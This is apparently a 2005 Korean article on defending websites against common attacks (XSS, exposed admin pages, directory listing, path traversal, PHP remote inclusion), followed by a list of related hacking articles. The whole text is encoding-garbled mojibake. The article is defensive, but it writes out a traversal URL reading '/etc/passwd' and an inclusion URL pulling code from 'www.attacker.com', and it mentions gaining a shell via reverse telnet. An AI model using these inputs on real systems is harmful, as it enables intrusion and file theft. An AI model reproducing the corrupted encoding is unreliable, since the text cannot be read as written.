ÀÌ¿¡ ´ëÀÀÇϱâ À§Çؼ­´Â ÆÄÀÏ ¾÷·Îµå Ãë¾àÁ¡À̳ª SQL ÀÎÁ§¼Ç Ãë¾àÁ¡°ú ¸¶Âù°¡Áö·Î »ç¿ëÀÚ ÀÔ·Â °ª¿¡ ´ëÇÑ À¯È¿¼ºÀ» °Ë»çÇØ¾ß ÇÑ´Ù. ÀϹÝÀûÀ¸·Î °ø°ÝÀÚ´Â <script> ű׸¦ ÀÌ¿ëÇØ °ø°ÝÇϹǷΠ<script> ¹®ÀÚ¿­ÀÌ µé¾î¿À¸é <xxscript>³ª ´Ù¸¥ ¹®ÀÚ·Î º¯È¯ÇØ ½ºÅ©¸³Æ® űװ¡ ½ÇÇàµÇÁö ¾Êµµ·Ï ¼³Á¤ÇØ¾ß ÇÑ´Ù. °ø°ÝÀÚ´Â <script> ÅÂ±× ¿Ü¿¡ ´Ù¾çÇÑ ±â¹ýÀ» ÀÌ¿ëÇØ °ø°ÝÇϱ⠶§¹®¿¡ ÇÊÅ͸µÀ» ÇÒ °ÍµéÀ» Á¤Çؼ­ ¸·´Â ¡®negative defence¡¯°¡ ¾Æ´Ñ ÀÔ·Â °¡´ÉÇÑ ¹®ÀÚ¸¸ Á¤ÇÑ µÚ ´Ù¸¥ ¹®ÀÚ°¡ µé¾î¿ÔÀ» ¶§ ÀüºÎ ¸·´Â ¡®positive defence¡¯¸¦ ÇÏ´Â °ÍÀÌ ÁÁ´Ù.

<È­¸é 6> ¸®¹ö½º ÅÚ³ÝÀ» ÀÌ¿ëÇØ ¿ø°Ý Ä¿¸Çµå ¼¿À» ȹµæÇÑ È­¸é

<È­¸é 7> DB Á¢¼Ó¿ë Á¤º¸¸¦ ¿­¶÷ ÇÏ´Â È­¸é

<È­¸é 8> MSSQL Db¿¡ Á¢¼ÓÇÑ È­¸é

<È­¸é 9> ¾ÆÆÄÄ¡ ¼³Á¤ ÆÄÀÏ È­¸é

<È­¸é 10> µð·ºÅ丮 ¸®½ºÆÃÀÌ ±ÝÁöµÈ È­¸é

°ü¸®ÀÚ ÆäÀÌÁö ³ëÃâ ¹®Á¦

À¥ »çÀÌÆ®¸¦ °ü¸®Çϱâ À§ÇØ Á¸ÀçÇÏ´Â °ü¸®ÀÚ ÆäÀÌÁö´Â ¿ÜºÎ ¾îµð¼­µç Á¢±ÙÇÒ ¼ö ÀÖ¾î ±âº»ÀûÀ¸·Î À§ÇèÇÏ´Ù. º¸Åë °ü¸®ÀÚ ÆäÀÌÁö´Â ¾ÆÀ̵ð¿Í Æнº¿öµå ±â¹ÝÀ¸·Î ÀÎÁõÀ» °ÅÄ¡Áö¸¸ °ü¸®ÀÚ Æнº¿öµå ÃßÃøÀ̳ª SQL ÀÎÁ§¼ÇÀ» ÅëÇØ ·Î±×ÀÎ ¿ìȸ °ø°ÝÀ» ¹ÞÀ» °¡´É¼ºÀÌ ÀÖ´Ù.

ÀÏÂ÷ÀûÀ¸·Î Á¶Ã븦 ÃëÇÒ ¼ö ÀÖ´Â °¡Àå °£´ÜÈ÷ ¹æ¹ýÀº °ü¸®ÀÚ µð·ºÅ丮 ¸íÀ» /admin/, /manager/, /adm/ °ú °°ÀÌ ÃßÃøÇϱ⠽¬¿î µð·ºÅ丮 ¸íÀ¸·Î ÇÏÁö ¾Ê´Â °ÍÀÌ´Ù. °ü¸®ÀÚ¸¸ÀÌ ¾Ë ¼ö ÀÖ´Â °íÀ¯ÇÑ µð·ºÅ丮 ¸íÀ» ÀÌ¿ëÇØ °ø°ÝÀÚ°¡ ÃßÃøÇÏÁö ¸øÇÏ°Ô ÇØ¾ß ÇÑ´Ù. °ü¸®ÀÚ ÀÌ¿ÜÀÇ IP¿¡ ´ëÇؼ­´Â µð·ºÅ丮 Á¢±Ù Á¦¾î¸¦ ¼³Á¤ÇÏ´Â ¹æ¹ýµµ ÀÖ´Ù.

ÀÌ·¸°Ô °ü¸®ÀÚ ÆäÀÌÁö¸¦ ¿ÜºÎ ¾ÇÀÇÀûÀÎ »ç¿ëÀÚ¿¡°Ô ³ëÃâÇÏÁö ¾ÊÀ½À¸·Î½á °ø°ÝÀÚ°¡ ¿øõÀûÀ¸·Î °ü¸®ÀÚ ÆäÀÌÁö¿¡ Á¢±ÙÇÒ ¼ö ¾øµµ·Ï Á¦ÇÑÇÑ´Ù.

µð·ºÅ丮 ¸®½ºÆà Ãë¾àÁ¡

µð·ºÅ丮 ¸®½ºÆà Ãë¾àÁ¡Àº À¥ ¼­¹ö ¼³Á¤»óÀÇ ¿À·ù·Î ÀÎÇØ ¹ß»ýÇÏ´Â Ãë¾àÁ¡ÀÌ´Ù. http://www.victim.com/admin/°ú °°ÀÌ Æ¯Á¤ µð·ºÅ丮¸¦ ºê¶ó¿ìÀú¿¡¼­ ¿­¾úÀ» ¶§ ±× µð·ºÅ丮¿¡ ÀÖ´Â ¸ðµç ÆÄÀϵé°ú µð·ºÅ丮 ¸ñ·ÏÀÌ ³ª¿­µÈ´Ù. ¾ÇÀÇÀûÀÎ »ç¿ëÀÚ´Â µð·ºÅ丮 ¸®½ºÆà Ãë¾àÁ¡À» ÀÌ¿ëÇØ µð·ºÅ丮¿¡ ¾î¶°ÇÑ ÆÄÀÏÀÌ ÀÖ´ÂÁö ÆľÇÇÒ ¼ö ÀÖ´Ù.

ÀÌ¿¡ ´ëÇÑ ´ëÀÀ¹æ¾ÈÀº ¾ÆÆÄÄ¡¿Í ÅèĹÀ» »ç¿ëÇÏ´Â µÎ °¡Áö·Î ±¸ºÐÇØ »ìÆ캼 ¼ö ÀÖ´Ù. ¸ÕÀú ¾ÆÆÄÄ¡ÀÇ °æ¿ì ·¹µåÇÞ 9À» ¼³Ä¡ÇÏ¸é ±âº»ÀûÀ¸·Î µð·ºÅ丮 ¸®½ºÆà Ãë¾àÁ¡ÀÌ Á¸ÀçÇÑ´Ù. ·¹µåÇÞ 9¿¡ ¼³Ä¡µÅ ÀÖ´Â ¾ÆÆÄÄ¡¿¡¼­´Â <È­¸é 9>¿Í °°ÀÌ httpd.conf ÆÄÀÏ¿¡¼­ Document Root Directory°¡ ÀÖ´Â <Directory> ºÎºÐ¿¡ indexes¸¦ »èÁ¦ÇÏ¸é µÈ´Ù. ÀÌ·¸°Ô ó¸®ÇÑ ÈÄ µð·ºÅ丮 ¸®½ºÆÃÀ» ½ÃµµÇϸé <È­¸é 10>°ú °°ÀÌ ¸®½ºÆÃÀÌ ±ÝÁöµÈ´Ù.

ÅèÄÏÀ» »ç¿ëÇÑ´Ù¸é ÅèĹ Ȩ µð·ºÅ丮 ¾Æ·¡¿¡ ÀÖ´Â /conf/ µð·ºÅ丮ÀÇ web.xml ÆÄÀÏ ¼³Á¤À» º¯°æÇØ¾ß ÇÑ´Ù. <È­¸é 11>ó·³ web.xml ÆÄÀÏ¿¡¼­ listings ºÎºÐÀÇ °ªÀ» true¿¡¼­ false·Î ¼öÁ¤ÇÏ¸é µð·ºÅ丮 ¸®½ºÆÃÀ» ¸·À» ¼ö ÀÖ´Ù.

ÆÄÀÏ ´Ù¿î·Îµå(Directory Traversal, ÆÄÀÏ Å½»ö) Ãë¾àÁ¡

µð·ºÅ丮 Ž»ö Ãë¾àÁ¡(ÆÄÀÏ ´Ù¿î·Îµå Ãë¾àÁ¡)Àº ÀÚ·á½Ç¿¡ ¿Ã¶ó°£ ÆÄÀÏÀ̳ª À¥¿¡¼­ ÆÄÀÏÀ» ´Ù·ê ¶§ ÆÄÀÏ ¸íÀ» ÀûÀýÇÏ°Ô Ã¼Å©ÇÏÁö ¾Ê¾Æ °ø°ÝÀÚ°¡ ¡®../¡¯¿Í °°Àº ÆÄÀÏ¸í ¾Õ¿¡ »óÀ§ µð·ºÅ丮·Î ¿Ã¶ó°¡´Â ¹®ÀÚ¸¦ ÀÔ·ÂÇØ ¡®../../../../../../etc/passwd¡¯¿Í °°ÀÌ ½Ã½ºÅÛÀÇ Áß¿äÇÑ ÆÄÀÏÀ» ´Ù¿î·ÎµåÇÒ ¼ö ÀÖ´Â Ãë¾àÁ¡ÀÌ´Ù. º¸Åë ÆÄÀÏÀ» ´Ù¿î¹ÞÀ» ¶§ Àü¿ë ´Ù¿î·Îµå ÇÁ·Î±×·¥À» ÀÌ¿ëÇØ ´ÙÀ½°ú °°ÀÌ ÀÔ·ÂÇÑ´Ù.

http://www.domain.com/bbs/download.jsp?filename=Å×½ºÆ®.doc

±×·¯³ª ¿©±â¼­ Å×½ºÆ®.doc ´ë½Å ´ÙÀ½°ú °°ÀÌ ½ÃµµÇϸé etc/passwd ÆÄÀÏÀ» ´Ù¿î·ÎµåÇÒ ¼ö ÀÖ´Ù.

http://www.domain.com/bbs/download.jsp?filename=../../../../../../../etc/passwd

À̸¦ ¸·±â À§Çؼ­´Â ÆÄÀÏÀ» ´Ù¿î¹Þ´Â Àü¿ë ÇÁ·Î±×·¥(ÀÌ »ç·Ê¶ó¸é download.jsp)¿¡¼­ ÆÄÀÏ¸í¿¡ ´ëÇÑ ÇÊÅ͸µÀ» ¼öÇàÇØ ÆÄÀÏ¸í¿¡ ¡®..¡¯ ¶Ç´Â ¡®/¡¯¿Í °°Àº ¹®ÀÚ¿­À» ÀÔ·ÂÇÏÁö ¸øÇϵµ·Ï ¼³Á¤ÇØ¾ß ÇÑ´Ù. ÆÄÀϸíÀ» DB¿¡ ÀúÀåÇÑ ÈÄ index¸¦ ÀÌ¿ëÇØ ºÒ·¯¿À°Ô ÇÏ´Â ¹æ¹ýµµ ÀÖÀ¸¸ç, À¥ ¼­¹ö ¼³Á¤ÆÄÀÏ¿¡¼­ À¥ Ȩ µð·ºÅ丮 ÀÌ¿ÜÀÇ ÆÄÀÏÀº Á¢±ÙÇÏÁö ¸øÇϵµ·Ï ¼³Á¤ÇÏ´Â °Íµµ ÁÁ´Ù.

¼Ò½ºÄÚµå ÀÎÁ§¼Ç Ãë¾àÁ¡

PHPÀÇ Æ¯Â¡ÀÎ ¿ÜºÎ ÆäÀÌÁö ÂüÁ¶ ±â´ÉÀÌ È°¼ºÈ­µÇ¾î ÀÖ´Â °æ¿ì ¿ÜºÎ À¥ ¼­¹ö¿¡ ÀúÀåµÈ PHP ¼Ò½ºÄڵ尡 ƯÁ¤ ÆÄÀÏ¿¡ ÀÇÇØ ÀÐÇôÁö´Â Ãë¾àÁ¡ÀÌ´Ù. ÀÌ Ãë¾àÁ¡À» ÀÌ¿ëÇÏ¸é ¿ø°Ý¿¡¼­ ¼Ò½ºÄÚµå ÀÎÁ§¼ÇÀ» ÅëÇØ ½Ã½ºÅÛ ³»ºÎ ¸í·É¾î¸¦ ½ÇÇàÇÒ ¼ö ÀÖ´Ù.

http://www.target.com/test/test.cgi?dir=http://www.attacker.com/cgi-bin/

À̸¦ ¸·±â À§Çؼ­´Â php.ini ÆÄÀÏ¿¡¼­ allow_url_fopen = OnÀ̶ó°í µÇ¾î ÀÖ´Â ºÎºÐÀ» allow_url_fopen = Off·Î ¼³Á¤ÇÏ¸é µÈ´Ù. ¶ÇÇÑ ÆÄÀÏ ´Ù¿î·Îµå Ãë¾àÁ¡°ú ¸¶Âù°¡Áö·Î »ç¿ëÀڷκÎÅÍ °ªÀ» ³Ñ°Ü¹ÞÀ» ¶§ ÀԷ¹޴ °ª¿¡ ´ëÇÑ ÇÊÅ͸µÀ» ÇÏ´Â ¹æ¹ýµµ ÀÖ´Ù.

<È­¸é 11> ÅèÄÏÀÇ ¼³Á¤ ÆÄÀÏ È­¸é

Çѱ¹Àº ¿Ü±¹ ÇØÄ¿ÀÇ ³îÀÌÅÍ?

Áö±Ý±îÁö À¥ ÇØÅ·ÀÇ °³³ä°ú ±â¼ú, ½ÇÀü À¥ ÇØÅ· µ¥¸ð¿Í ±×¸®°í ±×¿¡ ´ëÇÑ ´ëÀÀ ¹æ¾Èµé¿¡ ´ëÇØ »ìÆìºÃ´Ù. À¥ ÇØÅ·Àº °íµµÀÇ Áö½ÄÀ» ¿ä±¸ÇÏÁö ¾Ê´Â ¹Ý¸é, ±× ÇÇÇسª ÆıÞÈ¿°ú´Â ¾öû³ª´Ù. ´ëºÎºÐÀÇ À¥ ÇØÅ·ÀÌ ÀÌ·ç¾îÁö´Â °ÍÀº °³¹ßÀÚµéÀÇ º¸¾ÈÄڵ忡 ´ëÇÑ Áö½ÄÀÌ ºÎÁ·Çϰųª °ü¸® Ãø¸é¿¡¼­ ÆÐÄ¡¸¦ ÇÏÁö ¾Ê¾Ò±â ¶§¹®ÀÌ´Ù. ÇÊÀÚ°¡ ¸ðÀÇÇØÅ·À» Çϸ鼭 IT ÂÊÀ¸·Î ÅõÀÚ°¡ Àß µÇ¾î ÀÖ´Â ±â°üÀ̳ª, ±ÝÀ¶±Ç, ´ë±â¾÷ÀÇ À¥ »çÀÌÆ®¸¦ ÄÁ¼³ÆÃÇØ º¸¾ÒÀ¸³ª »ó´ëÀûÀ¸·Î º¸¾ÈÀÌ ¸¹ÀÌ Ãë¾àÇÑ °ÍÀ» º¼ ¼ö ÀÖ¾ú´Ù.

¿äÁò µé¾î¼­´Â º¸¾È¿¡ ´ëÇÑ Àνİú »ý°¢ÀÌ ¿¹Àüº¸´Ù ¸¹ÀÌ ÁÁ¾ÆÁ®¼­ º¸¾È ÄÁ¼³ÆÃÀ» ÇÑ ¹ø ÀÌ»ó ¹ÞÀº °í°´ »çÀÌÆ®µéÀº ±âº»ÀûÀÎ À¥ ÇØÅ·ÀÇ Ãë¾àÁ¡À» °³¼±ÇÑ °æ¿ì°¡ ¸¹´Ù. ±×·¸Áö¸¸ »õ·Î¿î ½Ã½ºÅÛÀ» µµÀÔÇϰųª °³¹ßÀÌ ÁøÇàµÇ¸é ¿©ÀüÈ÷ °³¹ß ±âÇÑÀ» ¸ÂÃß´À¶ó º¸¾È ÂÊÀº »ó´ëÀûÀ¸·Î ½Å°æ¾²Áö ¸øÇÏ´Â °Íµµ »ç½ÇÀÌ´Ù.

±¹³» ÀÎÅͳÝÀÌ ¿Ü±¹ÇØÄ¿µéÀÇ ³îÀÌÅͶó°í ºÒ¸®±â ½ÃÀÛÇÑ Áö ¹ú½á 4~5³âÀÌ Áö³µ´Ù. ƯÈ÷ ¿¹Àü¿¡´Â ÇØÄ¿³ª Å©·¡Ä¿µéÀÌ ÁÖ·Î Å« ½Ã½ºÅÛÀ» °ø°ÝÇßÀ¸³ª ÃÖ±Ù¿¡´Â À©µµ¿ì ¿î¿µÃ¼Á¦¿¡ ´ëÇÑ Ãë¾àÁ¡ÀÌ ¸¹ÀÌ ³ª¿À¸é¼­ °³ÀÎ PC »ç¿ëÀÚµéÀÌ ¿¹Àüº¸´Ù ÇÑÃþ ´õ ¾ÇÀÇÀûÀÎ ÇØÅ·ÀÇ À§Çè¿¡ ³ëÃâµÅ ÀÖ´Ù. À̹ø ±Û¿¡¼­ »ìÆ캻 ³»¿ëÀ» Åä´ë·Î °³¹ßÀÚ¿Í °ü¸®ÀÚ ¶Ç´Â ÀÏ¹Ý »ç¿ëÀÚµéÀÌ ÀÌ¿Í °°Àº À¥ ÇØÅ·¿¡ ´ëÇÑ Ãë¾àÁ¡À» ÀνÄÇÏ°í ½º½º·Î º¸È£ÇÒ ¼ö ÀÖ´Â °è±â°¡ µÇ¾úÀ¸¸é ÇÑ´Ù.

µð·ºÅ丮 Á¢±Ù Á¦¾î ¼³Á¤Çϱâ

µð·ºÅ丮 Á¢±Ù Á¦¾î¸¦ ¼³Á¤ÇÏ·Á¸é ½ÇÇà¿¡¼­ inetmgrÀ» ÀÔ·ÂÇØ <È­¸é 1> °ú °°Àº ÀÎÅÍ³Ý Á¤º¸ ¼­ºñ½º È­¸éÀ» ¶ç¿î ÈÄ Á¢±ÙÁ¦¾î¸¦ ¼³Á¤ÇÑ µð·ºÅ丮¸¦ ¼±ÅÃÇÏ°í µî·ÏÁ¤º¸¸¦ ¿¬´Ù. admin µî·ÏÁ¤º¸¿¡¼­ µð·ºÅ丮 º¸¾È ÅÇÀ» ¼±Åà ÈÄ ÆíÁý ¹öÆ°À» ´©·ç¸é <È­¸é 2> ¿Í °°Àº IP ÁÖ¼Ò¿Í µµ¸ÞÀÎ À̸§À» Á¦ÇÑÇÏ´Â È­¸éÀÌ ³ªÅ¸³­´Ù.

<È­¸é 1> ÀÎÅÍ³Ý Á¤º¸ ¼­ºñ½º¿¡¼­ µð·ºÅ丮 µî·ÏÁ¤º¸¸¦ ¼±ÅÃÇÏ´Â È­¸é


<È­¸é 2> ƯÁ¤ À¥ µð·ºÅ丮¿¡ ¾×¼¼½ºÁ¢±Ù Á¦¾î Ãß°¡ÇÏ´Â È­¸é


¿©±â¼­ ±âº»ÀûÀ¸·Î ¸ðµç ÄÄÇ»ÅÍ¿¡ ¾×¼¼½º °ÅºÎ¸¦ ¼±ÅÃÇÑ ÈÄ Ãß°¡¸¦ ´©¸¥´Ù. ±×¸®°í <È­¸é 3> ó·³ Á¢±ÙÀ» Çã°¡ÇÒ ´ë»ó ½Ã½ºÅÛ¸¸À» ¼³Á¤ÇÏ¸é µÈ´Ù. È­¸é 4´Â °ü¸®ÀÚ IP ÀÌ¿Ü¿¡ »ç¿ëÀÚ°¡ ȨÆäÀÌÁö¿¡ Á¢¼ÓÇßÀ» ¶§ ³ªÅ¸³ª´Â È­¸éÀÌ´Ù. IP ÁÖ¼Ò °ÅºÎ ¸Þ½ÃÁö°¡ ³ªÅ¸³ª´Â °ÍÀ» È®ÀÎÇÒ ¼ö ÀÖ´Ù.

<È­¸é 3> ƯÁ¤ IP¿¡ ´ëÇؼ­¸¸ Á¢±ÙÀ» Çã¿ëÇÏ´Â È­¸é


<È­¸é 4> ƯÁ¤ µð·ºÅ丮¿¡ IpÁ¢±Ù Á¦¾î°¡ °É·Á ÀÖ´Â È­¸é

Á¦°ø : DBÆ÷Å»»çÀÌÆ® DBguide.net


Ãâó : ¸¶ÀÌÅ©·Î¼ÒÇÁÆ®¿þ¾î [2005³â 4¿ù]

                    ´äº¯/°ü·Ã ¾²±â     ÀÌÀü±Û ´ÙÀ½±Û    
¹®¼­¹øÈ£À帣¹®¼­¸íÃâó÷ºÎ
     ÀÌ°÷¿¡¼­´Â À¥ÇØÅ·¿¡ ´ëÇÑ ¹®¼­µéÀ» Á¦°øÇÕ´Ï´Ù.
43 À¥ÇØÅ·    À¥ÇØÅ· ¹æ¾îÇϱâ Á¶ÅÂÇü  
42 À¥ÇØÅ·    ÀÚÁÖ »ç¿ëµÇ´Â SQL °ø°Ý¿ë ½ºÆ®¸µ µµÇ¥ ±èÁøÅà  
41 À¥ÇØÅ·    ¾÷·Îµå °ø°Ý ¹æ¾î¹ý °³³äÀâ±â ±èÁøÅà  
40 À¥ÇØÅ·    ´Ü¼øÇÏ°í À§ÇèÇÑ À¥ ÇØÅ·ÀÇ ¼¼°è ±è°æ°ï  
39 ÄíÅ°    cookie spoofing & sniffing Á¶ÅÂÇü  
38 À¥ÇØÅ·    À¥ cmd Á¶ÅÂÇü  
37 ±¸±Û    ±¸±ÛÇØÅ· ¹æ¾îÇϱâ Á¶ÅÂÇü  
36 À¥ÇØÅ·    À©µµ2K¿¡¼­ IE °ø°ÝÇÏ´Â ¹ý ±èÁøÅà  
35 À¥ÇØÅ·    Web CMD(php, jsp) ÅÖ³¯°³  
34 ±¸±Û    ±¸±ÛÇØÅ· Å°¿öµå ±¸»ç¹ý ±èÁøÅà  
33 À¥ÇØÅ·    P2P ÆÄÀÏ °øÀ¯ ÇÁ·Î±×·¥ V-share Ãë¾àÁ¡ Ãֹμº  
32 À¥ÇØÅ·    Á¦·Îº¸µå Ãë¾àÁ¡ ÃÑÁ¤¸® Á¶ÅÂÇü  

 
¸ñ·Ï